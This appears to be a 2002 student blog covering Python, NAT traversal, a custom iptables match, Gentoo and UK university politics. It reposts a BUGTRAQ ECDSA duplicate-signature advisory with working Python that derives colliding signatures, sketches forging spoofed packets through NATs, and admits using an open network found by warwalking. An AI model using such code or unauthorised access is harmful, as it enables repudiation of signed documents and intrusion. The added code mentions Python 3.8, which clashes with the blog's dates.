    Zooko wrote me an email about the merits and demerits of Atlas Shrugged and I decided to try and read it. I can't help but wonder if the loan length is meant to tell me something. A different book I got out today has to be back by 5/12, but Atlas Shrugged is due back 29/4/03.

    New Python Objects

    There's a copy of Atlas Shrugged in the library, but I'm afraid of starting a book that huge given the amount of time it might suck up. Anyone read it and wish to commend/curse it?

    There was a pretty interesting discussion on comp.lang.python recently. Take the following code:

    class C:
        def __getattr__ (self, x):
            self.val = 1
            return getattr (self.val, x)

    Now calling x = C(); x + 5; returns 6 as expected. Now make C a new style Python class (by deriving it from object) and you get:

    Traceback (most recent call last):
      File "", line 1, in ?
    TypeError: unsupported operand types for +: 'C' and 'int' 

    Alex Martelli explained things thus:

    Yes it can. The idea is that operators should rely on special methods defined by the TYPE (class) of the object they're working on, NOT on special methods defined just by the OBJECT itself and not by its class. Doing otherwise (as old-style classes did, and still do for compatibility) is untenable in the general case, for example whenever you consider a class and its metaclass (given that the metaclass IS the class object's type, no more and no less).

    So, for example, a + b now looks for a potential __add__ special method, NOT in a itself, but rather in type(a) [except, for compatibility, when a instances an old-style class]. I had some difficulty understanding that, early on in the lifecycle of Python 2.2, but when the notion "clicked" I saw it made a lot of sense.

    So, to wrap an arbitrary object X in such a way that X's special methods will be used by any operator, you need to ensure you do the wrapping with a _class_ that exposes said special methods. That's generally easiest to do with a factory function with a nested class that uses inheritance, but you have many other choices depending on what exactly you're trying to accomplish.
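
    A minimal sketch of what Alex describes, written for Python 3 (where every class is new-style). The names Proxy, AddingProxy, wrap and add_fails are made up for illustration and do not come from the thread, and val is set in __init__ rather than inside __getattr__ to keep things short.

```python
class Proxy(object):
    """Forwards ordinary attribute lookups to a wrapped value."""

    def __init__(self, val):
        self.val = val

    def __getattr__(self, name):
        # Only consulted for names that normal lookup fails to find.
        return getattr(self.val, name)


class AddingProxy(Proxy):
    # Defining __add__ on the class itself is what makes `+` work.
    def __add__(self, other):
        return self.val + other


def wrap(obj):
    """Factory function with a nested class that inherits from type(obj).

    Assumes type(obj) can be subclassed and copy-constructed (int, str, list...).
    """
    class Wrapper(type(obj)):
        pass
    return Wrapper(obj)


def add_fails(x):
    """Return True if `x + 5` raises TypeError."""
    try:
        x + 5
    except TypeError:
        return True
    return False
```

    Here Proxy(1).bit_length() still works because it is a plain attribute lookup, but Proxy(1) + 5 raises TypeError since the operator only looks at the class. AddingProxy(1) + 5 and wrap(1) + 5 both succeed because the special method is found on the type.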

    Hmm, just a links posting...

    Hmm, just a links posting today.

    Leaky Abstractions

    The UCL and Imperial merger is off, thank god!

    Everyone seems to be commenting on leaky abstractions, in which Joel berates non-perfect abstractions. Well, enough people have taken him to task for that but no one seems to point out that perfect abstractions can be a total nightmare in certain situations.

    Now, I'm sure we all know the advantages of abstractions, but in some cases you aren't writing portable applications and the abstractions only serve to frustrate you.

    Take TCP. There is no way to find out which data has been acked by the other side, the seq/ack numbers etc from any sockets implementation that I've ever seen. When you're writing freaky NAT stuff that information can be needed. See the exokernels papers for designs which take the idea of pierceable abstractions to the (safe) limit.

    The Perfect Prawn Cocktail Sandwich

    I consider myself quite the expert on prawn cocktail sandwiches. I've had them from all round the country, from several other countries, and even fresh in a fishing village. But living just down the road from Harrods I thought I might as well give them a shot. Quite frankly, I don't think I'll ever be able to stomach a non-Harrods prawn cocktail sandwich ever again!

    UK DMCA Reply

    Got a three page reply from my MP today containing a couple of letters from the Dept of Trade and Industry about the EUCD:

    Basically, the DTI replies are avoiding the question and generally seem to indicate a lack of understanding:

    The EU Copyright Directive does not require us to make any changes that will affect the ownership of intellectual property.

    Laws of Form

    (Laws of Form, G. Spencer Brown, ISBN: 0 04 510028 4)

    I got Laws of Form from the library after it was mentioned in this K5 article on alternative logic systems. (it is also mentioned in The Ghost Not).

    It's a neat little book, if a little dry. I highly recommend reading the notes at the same time as reading the chapters in order to make sense of anything. I must admit that, at the end of it, I'm a little disappointed. The ideas contained are neat, but I cannot help feeling that a different author could have made a better job of the book. In fact, I'm very glad I had read the two links above before the book as they explain things a lot more clearly. Also, some of the more interesting parts (such as the link to predicate logic) are given but a short section in the notes.

    G\"odel's Proof
    (G\"odel's Proof, Ernest Nagel and James R. Newman, ISBN: not given)

    (I'm sure there's a &something; to get the accent right above the o. But I don't know what it is so just imagine that your brain preparses TeX...)

    Chaitin described G\"odel's 1931 paper as "very difficult to understand" and recommended this book instead. I wholeheartedly agree. I got this book from the library at 11am today and had finished it by 5pm, even with 4 hours of lectures and lunch and a geometry sheet in there too. A very gentle introduction to G\"odel's proof which deals with about as much detail as you would wish and no more. If you've translated the original paper from the German into Lojban etc, then you aren't going to get much from this, I'll admit; for everyone else this is a must.

    Aaron

    Aaron now has (IMHO) the prettiest blog. There is also a wonderful entry on trusted computing (best viewed in Mozilla).

    More NAT

    I now have a working way of getting data back thru NATs: ICMP. Echo Requests open a tunnel back through the NAT so, with a server assisting, NATed hosts can setup bidirectional links. Unfortunately, the NAT mangles the ID number which the other host needs in order to send replies.

    It so happens that the NAT at Imperial doesn't actually check the source address of the reply is correct, only the ID, so it would be easy to find the ID. But I cannot believe this is generally true so the only way to get the ID would be to use the fact that the NAT assigns IDs incrementally and try to hit the correct ID. Eww!
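
    For reference, a rough sketch of the packet in question: an ICMP Echo Request is an 8-byte header (type 8, code 0, checksum, ID, sequence) followed by a payload, and the 16-bit ID is the field the NAT rewrites. The function names below are my own, nothing here sends anything (that needs a raw socket and root), and candidate_ids only illustrates the "IDs are assigned incrementally" guess rather than anything measured.

```python
import struct

ICMP_ECHO_REQUEST = 8


def inet_checksum(data):
    """16-bit one's complement Internet checksum over data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def echo_request(ident, seq, payload=b""):
    """Build an Echo Request with the given ID and sequence number."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(packet):
    """Return (type, ident, seq, payload) from an ICMP echo packet."""
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]


def candidate_ids(last_seen, count):
    """IDs to try if the NAT hands them out incrementally (wraps at 16 bits)."""
    return [(last_seen + i) & 0xFFFF for i in range(count)]
```

    Running the checksum over a finished packet gives 0, which is a handy sanity check on whatever comes back through the NAT.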

    About 3 hours work this afternoon....

    ... I've so far learnt that NETLINK and QUEUE targets clash if they're both loaded into the kernel and NETLINK then appears to work, except that no actual packets turn up! AGGGH!

    That Poster

    I found a picture of that poster that I mentioned before on this page. Just remember, this hasn't been touched up or anything and there really are posters exactly like this all over London:

    Poster Image

    Communication Over Double NAT

    The DTCP design would work (I think) if only there wasn't also a firewall at Imperial which stops incoming UDP packets (even if a NAT would let them in). The only other solution would be to tunnel everything in DNS packets (which do seem to work) or to find another place to develop from.

    (P.S. they need to be real DNS packets - just using the port numbers isn't enough).

    So, here's the next idea - Assisted TCP. The idea being to have a userland program linked to libnet and libpcap at each end (A and B) and a 3rd party (C) unfirewalled. The ends can talk both ways to C via TCP and can fabricate packets to the NAT and the local kernel. C can fabricate packets with the source address of A and B to the other side of the NATs.

    Skipping the details, A & B both send SYN packets to each other (both die at the opposite NAT) then C fabricates SYN+ACK packets from A and B to make the NATs think it's a normal outgoing connection.

    That leaves out how to make the local kernel think it's a normal connection too, but I think it can be done without patching it directly.

    Ingress and Egress filters might stop C from sending the SYN+ACK packets and it's more messy than doing it via UDP, but it should work. (I've already checked that A can't send a SYN+ACK thru the NAT).
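
    A toy model of the idea, just to make the sequence of packets concrete. ToyNat is an invention for this sketch: it ignores ports, address rewriting, sequence numbers and timeouts, and simply assumes a NAT lets a SYN+ACK in only if it has seen a matching SYN go out. Real NATs may well be stricter.

```python
class ToyNat(object):
    """Remembers outgoing SYNs and only admits SYN+ACKs that answer one."""

    def __init__(self):
        self.syn_sent = set()  # (inside host, outside host) pairs

    def outbound(self, src, dst, flags):
        if flags == "SYN":
            self.syn_sent.add((src, dst))
        return True  # outgoing packets always pass in this model

    def inbound(self, src, dst, flags):
        # Unsolicited SYNs are dropped; a SYN+ACK must match an earlier SYN.
        return flags == "SYN+ACK" and (dst, src) in self.syn_sent


def assisted_handshake():
    """Walk through the Assisted TCP steps and record what gets through."""
    nat_a, nat_b = ToyNat(), ToyNat()
    log = {}
    # A and B each send a SYN; it leaves the local NAT but dies at the far one.
    nat_a.outbound("A", "B", "SYN")
    log["A's SYN reaches B"] = nat_b.inbound("A", "B", "SYN")
    nat_b.outbound("B", "A", "SYN")
    log["B's SYN reaches A"] = nat_a.inbound("B", "A", "SYN")
    # C fabricates SYN+ACKs carrying the other end's source address.
    log["spoofed SYN+ACK reaches A"] = nat_a.inbound("B", "A", "SYN+ACK")
    log["spoofed SYN+ACK reaches B"] = nat_b.inbound("A", "B", "SYN+ACK")
    return log
```

    In this model both SYNs are dropped and both fabricated SYN+ACKs get through, which is the whole trick. A NAT that never saw the outgoing SYN would drop the SYN+ACK too.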

    I would hope, in the end, to probe each technique to pick the best that works. In the meantime, it's a question of coming up with a decent toolkit.

    Introduction

    Just posted on BUGTRAQ (not by me):

    Contemporary world is practically impossible without systems of electronic digital signature (EDS). Every Internet user imperceptibly for himself uses them. It is these methods which ensure functionality and efficiency of contemporary banking sector. Despite this fact the EDS standards themselves are very young and are at the stage of perfection. One of the most perspective standards is ANSI X.9-62 ECDSA of 1999 - DSA for elliptic curves. In the process of adaptation all peculiarities of the operations with the elliptic curves were not taken into account to full extent and it gave an opportunity to imitate substitution of the signed document. One of the main requirements to the methods of digital signature is the impossibility to find within reasonable period of time two or more documents corresponding one signature (or vice versa). In addition to the EDS mechanism the procedure of hashing is used (in DSA it is SHA-1) which results in assigning to each document very large and unpredictable number (hereinafter referred to as hash) which is signed.

    The majority of the attacks is aimed at this procedure in order to find method of receiving documents with identical hashes (or hashes which differ at given value). This work uses slightly different approach: there is made an attempt by modification of the keys chosen by the user to find such meanings of the signature so that they match two previously determined hash values. It was determined that it can be done by ordinary user of EDS scheme, if he specially chooses value for his keys: private key and per- message secret. In this case the user does not need to modify domain parameters of EDS. For the purpose of clearness below is given an illustration of the substitution of signature for approved NIST sets of parameter of federal use.

    I suppose that there is no need to comment legal consequences of the existence of common signature for two documents.

    Description of the mistake

    Mathematical apparatus of the latest American standard of electronic digital signature know as ECDSA (DSA for elliptic curves) [1 page 25-30] contains grave mistake which makes it possible to choose value of secrete code in order to get identical signatures for various documents. The described mistake differs from the already known, having similar consequences DSKS (Duplicate Signature Key Selection) [1, page 30-32] as it does not require participation of the criminal in selection of signature parameters (G,n etc). Thus it is available for almost any EDS user and not only to EDS software engineers.

    The description retains symbols adopted in the standard.

    The mistake is caused by the equality of x-coordinates of the opposite points of the elliptic curve: _x(G) = _x(-G). (1)

    It is easy to see that from nG = 0 follows that (n-1)G = -G. (2)

    Thus r1 = _x(kG) = r2 = _x((n-1)kG) = r (3)

    where k - per-message secret of the signature for the purpose of simplicity taken for 1.

    The development of formula for k>1 is analogous.

    Let we need to select identical signature for messages M1 and M2 (or rather for their hashes e1 and e2). We can calculate such private key d that signatures for these messages will be identical. Let k1 = 1, k2 = n-1, then r1 = r2 = r = _x(G) (3a)

    Lets take a closer look at the formula of the signature:

    • s = k'(e+dr) mod n
    • s1 = k1'(e1+dr) mod n (4a)
    • s2 = k2'(e2+dr) mod n (4b)

    where

    • k1'*k1 mod n = 1; k1' = 1
    • k2'*(n-k1) mod n = 1; k2'= n-1
    • e1 = SHA(M1); e2=SHA(M2)

    This implies that s2 = s1 = s if

    (e1+dr) = (n-1)(e2+dr) (mod n) (5)

    2dr = (n-1)(e2+e1) (mod n) (5b)

    From here it is easy to find d: d = z'(n-1)(e2+e1) mod n (6)

    where z'*(2r) mod n = 1

    Thus we get absolutely identical signatures (s, r) for various messages.

    It is not difficult to correct this mistake. It is only necessary to provide for demonstrative generation of d.

    For example, random variable Seed0 is chosen. Private key d : = SHA-1(Seed0) Both values are retained. It is impossible to select desirable value d in this scheme. Of course, the time of key generation will increase, but it is not critical in the majority of cases.

    There is one more option: to send as signature not (s,r) but rather (s, R) where R=kG.

    Sincerely yours,

    A.V. Komlin, Russia

    Detailed description of ECDSA standard and known attacks at it is given in the book The Elliptic Curve Digital Signature Algorithm (ECDSA) Don Johnson (Certicom Research), Alfred Menezes (University of Waterloo) February 24, 2000. The book is available in PDF format at http://rook.unic.ru/pdf/ecdsa.zip.

    The mentioned below page contains Java-applet allowing to calculate within several seconds in the interactive mode identical signatures and required keys for any two different messages in five standard NIST curves or in any its own

    http://www.venue.ru/sign1en.htm

    The applet code is not closed and one can look it through with JAD.
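
    The algebra above is easy enough to check by hand, but here is a minimal sketch that runs it on NIST P-256 (one of the five NIST prime curves the advisory mentions). Everything in it is illustrative: the helper names and the two messages are made up, the curve arithmetic is the plain textbook affine version with no attempt at constant time, and it needs Python 3.8+ for pow(x, -1, m).

```python
import hashlib

# NIST P-256: y^2 = x^3 + ax + b over GF(p), base point G of prime order n.
p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
a = p - 3
b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551


def add(P, Q):
    """Add two affine points; None stands for the point at infinity."""
    if P is None:
        return Q
    if Q is None:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1 % p, -1, p) % p
    else:
        lam = (y2 - y1) * pow((x2 - x1) % p, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def mul(k, P):
    """Double-and-add scalar multiplication."""
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R


def sha1_int(msg):
    return int.from_bytes(hashlib.sha1(msg).digest(), "big")


def sign(d, e, k):
    """ECDSA signature (r, s) on hash e with an explicit per-message secret k."""
    r = mul(k, G)[0] % n
    return (r, pow(k, -1, n) * (e + d * r) % n)


def verify(Q, e, sig):
    r, s = sig
    if not (0 < r < n and 0 < s < n):
        return False
    w = pow(s, -1, n)
    X = add(mul(e * w % n, G), mul(r * w % n, Q))
    return X is not None and X[0] % n == r


def colliding_key(e1, e2):
    """Equation (6): the private key d that makes both signatures equal."""
    r = G[0] % n
    return pow(2 * r, -1, n) * (n - 1) * (e1 + e2) % n


e1 = sha1_int(b"I owe you 10 pounds")      # made-up message M1
e2 = sha1_int(b"I owe you 10000 pounds")   # made-up message M2
d = colliding_key(e1, e2)
Q = mul(d, G)                              # matching public key
sig1 = sign(d, e1, 1)                      # k1 = 1
sig2 = sign(d, e2, n - 1)                  # k2 = n - 1
```

    sig1 and sig2 come out identical, and that one (r, s) pair verifies against Q for both hashes. Note that the signer has to pick d (and k) specially, so this is a repudiation trick by the key owner rather than a forgery against someone else's key.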

    ARP Tables

    • A couple of Pd links here and here
    • Eight Legged Freaks isn't worth going to see.

    In recent kernels an option called arptables popped up. Like iptables and ip6tables it does pretty much what the name suggests. However, I can't find any userland tools for it and this message suggests there aren't any.

    After reading the code it seems reasonably easy to do. Unless someone beats me to it, I might give it a shot.

    DTCP

    ... but before I do, I'm going to give libdtcp a crack. DTCP is the protocol used in Coderman's Alpine and is designed for double NATed hosts with loose UDP-NAT rules. Watch this space.

    Java-SSH

    Since Mozilla is still being clipboard brain-dead I'm typing URLs into vim by hand. This means that I mess up some of them (since I'm too lazy to check) and, sure enough, I messed up the link to JSCH. Atsuhiko Yamanaka was kind enough to mail me and point it out. (now fixed)

    Secure Beneath the Watchful Eyes

    There's a poster campaign in London at the moment, run by London Transport, advertising the introduction of more CCTV cameras on buses. The slogan is "Secure Beneath the Watchful Eyes" and it has a big picture of disembodied eyes watching over a London bus going over Westminster bridge. (I wish I could find someone with a digital camera so I could take a picture of it.)

    Now, I don't have any figures on how effective CCTV on buses is etc and what the cost is so I can't judge if putting CCTV on buses is a good idea or not. But that poster scares me. Rather than suggesting that the CCTV cameras are there to deter people from doing <insert bad action here> the general sense is that we should feel all warm and fuzzy in our nanny state.

    I suppose it's just a poster campaign - but still...

    Oxford Union Meeting

    Well, the contact listed in NTK did finally reply. Unfortunately, it was a little late to organise a weekday trip. However, given the type of people there I'm sure it will be well covered. Bruce Dickinson and Chuck D are no longer appearing, by the way.

    All these events

    TBL pointed out that Neal Stephenson is speaking at Trinity this Thursday. I cannot, unfortunately, make it because of lecture and tutorial commitments. Also, there's a debate at Oxford on the same day (see the bottom of the last entry), but the contact given for that hasn't got back to me, so it doesn't look like I can make that either! To wrap things up, Ross Anderson, Alan Cox and a M$ rep are talking about TCPA in London. Zooko suggested I try to get in for free (it would otherwise be nearly 400GBP) by playing the student/hacker/reporter card. I'm sure I can get a camera and tape recorder to do a good report should they let me in.

    Mozilla Again

    After re-emerging mozilla it now starts up cleanly and has AA fonts - which is nice. Unfortunately, the AA fonts make it pretty slow and the clipboard doesn't work at all (pasting in, or copying from), so some of the links might have typos in them today. Sigh. (Oh, and it misses out some scanlines in text too.)

    Protests at IC

    Imperial has announced a couple of things that have annoyed a few people: firstly, charging students an extra "top-up" fee of up to £15,000 a year and, secondly, merging with University College. The first provoked a student protest [1][2] (with good turnout despite it being cold and rainy) and the latter a threat from the lecturers to strike.

    I think some background is needed here. For a long time, going to university was `free' (not including living and eating etc) because it was paid for by the government. That system was set up when 5% of the school leaving population were expected to attend a university. At the moment that number is more like 50% and a few years ago the (Labour) government started charging £1,100 per year in fees. Nearly all students are deeply in debt by the time they leave uni. Now, it costs the college something like £10,500 per year per student and they get £7,500 per year per student from the government. No wonder that something needs to be done.

    Now, if you live in the US you are thinking "£15,000 is nothing, look what I pay!", but the UK has never worked like that - we have a much higher level of taxation for one and the protest is largely about the lack of consultation with the Union. I think this text is interesting, as are some of the comments here.

    On a selfish note, it's unlikely that I would have to pay these fees as I'll be gone before they come in. Actually, I'll be forced to go before they start charging this.

    And onto the second issue, merging with UCL (University College, London). London Uni is (I think) unique in this country in that the colleges are more-or-less unis in themselves. At Oxford and Cambridge (who have the best known colleges) a subject is taught by the department and all students of x at the university go to the same department. However, Uni/London colleges have their own departments.

    Now, UCL is in deep fiscal trouble and if ICL and UCL merged they would likely split from the university and set up on their own. This could create a terrible mess as they would have to cut some duplicate departments (thus reducing costs etc, which is the point). Now I think that wherever UCL and ICL both have a department of x, ICL's is going to be better. But for political reasons they can't just choose on academic grounds because then UCL gets badly cut, so some ICL departments might get shut down. Also, ICL students are a little worried about the culture clash. UCL has 18,000 students and ICL less than 10,000 so, in a democratic Union, UCL holds sway.

    Cambridge

    I went to Cambridge yesterday to meet up with a couple of friends and have a look at some of the colleges in daylight. In short: both Downing and Trinity are beautiful. Now, Beit Hall at IC is reasonable, but most of IC is pretty ugly. Cambridge is a work of art.

    Unfortunately, I couldn't talk to TBL because I had to get back. I guess I'll have to accept his argument on random walks in n-d space until I can understand it. I would have liked to ask how his provable code project is going though.

    I also saw this book on quantum computing in the Waterstones there. Maybe a little dense, but might be good. Also there was this book which is the first book I've seen to cover iproute2.

    Libraries

    One of the best things about being at Uni is that you get access to a good library. I can easily waste hours in IC Central Library. It has the whole of Computers and Typesetting (Knuth) which has re-awakened my desire to rework TeX (this is pretty nuts, but one of my saner ideas). It also has AMOP, which is otherwise impossible to get in this country (except by getting it shipped as a one-off).

    Oh, and looking at the catalog it has the Quantum Computing book I mentioned above. My reading list has never been so long, or so cheap!

    Hilary Rosen in Oxford

    From NTK:

    NTK's two spiritual forefathers face off at last, when CHUCK "PUBLIC ENEMY" D and BRUCE "IRON MAIDEN" DICKINSON take opposing sides at next week's "This House Believes That Music Is Not For Sharing" debate at the Oxford Union (8.30pm, Thu 2002-10-24, Cornmarket St, Oxford, complex admission procedure which we'll go into later). The event also marks a rare UK public appearance by HILARY ROSEN of arch anti-P2P villains THE RECORDING INDUSTRY ASSOCIATION OF AMERICA, and thus a handy leafleting opportunity for the copy-protection-opposing CAMPAIGN FOR DIGITAL RIGHTS - plus a chance to get our new "Corrupt Disc - Inferior Audio" t-shirt at not-available-in-the-shops knock-down prices. Basically, mail tips@spesh.com (with the subject line "Fight The Power") for meet-up details - the Oxford Union is actually a members-only debating society rather than a proper Union like ULU, but does have a mildly complicated guest-admission procedure. Or failing that, we'll just go to the pub and swap mp3 remixes of "Bring The Noise".
    http://www.oxford-union.org/mod.php?mod=calendar&op=show_event&event_id=10 - "I'm Running Free", eh Bruce? Not under Palladium you're not
    http://uk.eurorights.org/issues/cd/button/ - actual "CD" logo font looks more like Eurostile Heavy to us
    http://www.yaleherald.com/article.php?Article=1153 - taking "talk like a pirate" day too far
    http://www.xenoclast.org/free-sklyarov-uk/2002-October/003442.html - file under "Yo, bum rush the show"

    I'm hoping to make it there, but it's a bit short notice.

    Mozilla

    Will takes me to task for upsetting poor old Mozilla - it does take a lot of bashing, doesn't it? Firstly, it's a beta kdebase which somewhat excuses the failure to compile.

    Seems Will gets on really well with Mozilla and suggests that the blank screen is a freetype problem. That it may be, but it means it takes me an extra 20 seconds every time as I startup mozilla - get a blank screen - swear - kill mozilla - rm -Rf ~/.mozilla - startup mozilla. Even then it's just not very fast. It has got better - it used to be unusable on IV, now it's just slow. I'm afraid that Konqueror and Opera just run faster here, even if their CSS support is a little dodgy.

    (Also, tabbed browsing is only useful for people who have overlapping windows - no such things there)

    Build Options

    Will also points to this page with lots of weird and wonderful gcc options for building Gentoo (or anything else really). Just remember, you're not allowed to use anything that breaks the ABI, even if you build from stage1, because it still links some binary code in.

    Firewalls

    Sometimes, even iptables can't do what you want and you have to start coding. So last night I coded up ipt_machide (and libipt_machide for userspace) for my firewall.

    Basically, an incoming packet (Ethernet only) matches if its source MAC address is in your ARP table. Now, the source MAC address is very spoofable, so you have to have normal rules under that, but it works very well to hide from scans (of which there are many on the IC halls network). As soon as you try to contact another box, a pending entry is put in your ARP table, the ARP reply matches and everything works fine.

    At the moment I have to do a linear search of the ARP table because it's indexed by IP address, not MAC. It might be reverse indexed, but there are no comments at all so it's a little difficult to tell. Also, quite a number of IPs have the MAC address of the NAT box here so I need to check that the source IP address (if there is one) matches the ARP entry too.
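
    The matching rule is simple enough to sketch outside the kernel. This is not the ipt_machide code, just the same logic in a few lines, with the ARP table modelled as a plain dict from IP address to MAC address. The function names and the addresses used with it are invented, and pending ARP entries are not modelled.

```python
def source_mac_known(arp_table, src_mac, src_ip=None):
    """True if src_mac is in the ARP table (and belongs to src_ip, if given)."""
    src_mac = src_mac.lower()
    # Linear search, because the table is keyed by IP address, not MAC.
    for ip, mac in arp_table.items():
        if mac.lower() != src_mac:
            continue
        # Several IPs can share one MAC (e.g. everything behind a NAT box),
        # so also insist that the source IP matches when the packet has one.
        if src_ip is None or src_ip == ip:
            return True
    return False


def reverse_index(arp_table):
    """Build the MAC -> set of IPs index that would avoid the linear search."""
    index = {}
    for ip, mac in arp_table.items():
        index.setdefault(mac.lower(), set()).add(ip)
    return index
```

    With a reverse index the lookup becomes a single dict access plus a set membership test, at the cost of keeping the index in step with the table.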

    Aaron goes to DC, I'm sure ...

    • Aaron goes to DC
    • I'm sure I've read lots of interesting stuff that deserves a link here, but my bookmarks are a little fragmented so I don't have any links.

    Eep. It's been a while since I've updated this (but not as long as Ian). Internet connectivity is pretty much sorted out and I've been using the extra bandwidth to install Gentoo. For those who don't keep up with Linux distrib news, Gentoo is a new, source based distrib.

    The current (beta, but soon to be 1.4) release uses GCC 3.2 to compile and, since it builds (almost) everything from source, you are free to set nice compile options (like -march=pentium2 -O3 -pipe etc). GCC 3.2 has some nice new code like the register colouring algorithm, which means that the generated code is pretty slick. So the idea is that Gentoo runs pretty fast and, on the whole, you can notice it. It's not jaw dropping, but it is there.

    But, of course, it takes time to compile all that stuff. I gave up on OpenOffice after 24 hours (dual PII 450) and kdebase just fails to build. Gentoo does have something called the "Gentoo Reference Platform" for binary installs, but I don't think it's live yet.

    So lacking kdebase means that I don't have my much-loved konqueror. Not disheartened, I emerge mozilla and mozilla 1.0 builds just fine. Shame about the code. Every time I start it up I need to rm -Rf .mozilla otherwise all I get is a blank window, creating new windows just does nothing, and copying and pasting also does naught. I guess the saving grace is that it doesn't crash like my old Debian 0.9 package did. Unfortunately, a usable browser it is not, so with a quick prayer to the Stallman idol in the corner I installed Opera 6.

    Damn. I hope I get konq installed soon to save my GNU soul because Opera just works, and works fast, and renders correctly and ... The only niggle I have is the oversized toolbar which is in the free version. The answer to that is, of course, to pay for it.

    Oh, and the department are getting some Macs so I'll have to play with more non-free software.

    The USS Clueless gets /.'...

    Well, my bank refused me a debit card, so as much as I'd like to pay for the Internet connection in my room - I can't because they don't take cash. Thankfully, they allow free access to the department computers and ssh (at least in 3.4) has a nice feature called dynamic port forwarding. Basically, you pass -D xyz on the command line and port xyz is a SOCKS4 proxy and all connections get forwarded down the ssh tunnel.

    I'm not sure that it's working perfectly yet (OpenSSH_3.4p1 Debian 1:3.4p1-2) as sometimes the connection will just stall - but Gentoo is installing fine using it. It also means that the people on the same hub as me don't get to see what I'm reading.

    However, since everything goes down one connection things aren't quite perfect as a single dropped packet will stall everything, not just the single substream because they're all the same to TCP. However, on a 10Base-TX connection that's not a major issue.

    Also, the sysadmins at Imperial seem really nice and I hope to move IV to a department server at some point.

    <AccordionGuy> XML is to programming as modifying the main deflector [array] is to Star Trek.

    Well, I'm offline again a...

    Well, I'm offline again and warwalking doesn't turn up anything useful. I found a nice little NAT box that was helpfully forwarding packets and acting as a web proxy for me. That has now disappeared. I guess they noticed the hole. I would be quite willing to pay for it, but they refuse to take cash and my debit card is still coming through. I hate the fiscal system, but efforts seem to be stalled at the moment.

    The most interesting paper I've read in a while is from the Tarzan people. They basically describe an IP level anonymising layer. Even if you think you know more than should be legally allowed about mixnets/DCRs and pipenets it's worth a read. It includes a couple of nice tricks I haven't seen before.

    The source code hasn't been released, but Michael Freedman has hinted to me that they are talking to the Cebolla folks about a common codebase.

    In the short time that I did have use of that NAT box I managed to apt-get upgrade and install Gentoo. I've now got to go pruning services on my Debian install (Lord alone knows why it decided to install ircd and diald).

    Imperial is keeping me pretty busy, though none of the material is really stunning at the moment. I did end up in a second year maths lecture today because of a timetabling fault, however, and it was pretty good. Maybe I should lecture hop.

    Long (ish) story, but I'm...

    Long (ish) story, but I'm back online now at Imperial. Will write more when I have the time.

    Life at Imperial

    As I write this I still don't have any connection so god knows when this will be uploaded. There is a 10Base-TX connection in my room, but it doesn't seem that anything is happening on it. I think I need to go someplace and register for them to make it live.

    No access points either at the moment, though I haven't gone warwalking yet. I don't imagine that the Imperial APs will be switched on this early in the term anyway.

    The room (shared) is beautifully positioned and big enough to drive a car between the beds, which is a pleasant surprise. I gather from talking to some of the students in other halls that I could have done a lot worse.

    More, I guess, when I have more time and more to say. I should find someone with a digital camera to take some photos of this place, but right now I'm off warwalking.

    "Essences, Orcs and Civilization"

    David Brin (author of Transparent Society) has a fantastic keynote transcript on his site from the Libertarian Party National Convention (July 2002).

    This text is really the perfect speech to give to the Libertarians, esp the part about their drugs policy. In fact, I can't pull out a single paragraph that I want to take issue with.

    Now all I need is for someone to write a nice, lucid essay on how money is not the territory.

    Nothing wonderfully excit...

    Nothing wonderfully exciting today I'm afraid.

    Writers for hire by compa...

    Writers for hire by companies and governments. One wonderful quote:

    Will Self said: "I return to the words of Bill Hicks when he said, 'If any artist ever endorses a product then they have completely destroyed their status as an artist.' I don't care if they shit Mona Lisas on cue, they've destroyed their reputations, and advertising for the Government is much more pernicious."

    The proceedings of the OLS are up (and have been for a while). A treasure trove of interesting papers is contained therein. Highlights (so far) include:

    • Lustre: the intergalactic file system
    • Cebolla: Pragmatic IP Anonymity
    • SE Debian: how to make NSA SE Linux work in a distribution
    • Online Resizing with ext2 and ext3
    • Advanced Boot Scripts
    • BitKeeper for Kernel Developers
    • Linux Advanced Routing & Traffic Control

    I've finished ripping my CD collection and they don't make 'em like they used to. My older CDs would be quite happy reading at 4 speed. The newer ones (from about 92 onwards) struggle to manage 1.4 speed (there are a couple in between). The older ones seem to be physically thicker too. I guess they cut down on the quality at some point to reduce production costs.

    oh, and mirrors of dvdsynth should they become, ah, required.

    Imperial Looms

    Preparations for Imperial continue... Since I don't think I can fit both monitors in my room I've switched to using just one to see if I can manage. It's not too bad; I've had to rejig my desktops and I'm switching much more between them, but I think I can cope. The main problem so far is that my bookmarks aren't even close to fitting on one screen. Not using multi-head also means that I can have anti-aliased fonts, but I think I need to set them up a little first.

    I'm also ripping all my CDs at the moment (OGG, of course). For that I've had to buy a new power supply since my old 230W browned out under the load of all 4 SCSI drives, 2 processors and a DVD drive going. This new one is going fine, hell, I might even spin up the 20GB IDE and the 36GB SCSI that I'm not using at the moment.

    The move also means that I'm finally buying all the stuff I should have bought before, namely:

    • New watch, a Timex Expedition with a nice leather strap (looks a little like this one). I broke the last one on a bouncy castle.
    • A new short-wave radio. At the moment I use that radio in my stereo, but since the CD and tape players are broken it seems a little silly to take the whole thing.
    • A 10/100 network card (DLink 530TX, a VIA Rhine based card). A pair of these have been working 24x7 in metis for months now, so I guess they're pretty good.
    • 300W PSU (see above)
    • New headphones

    T0rn

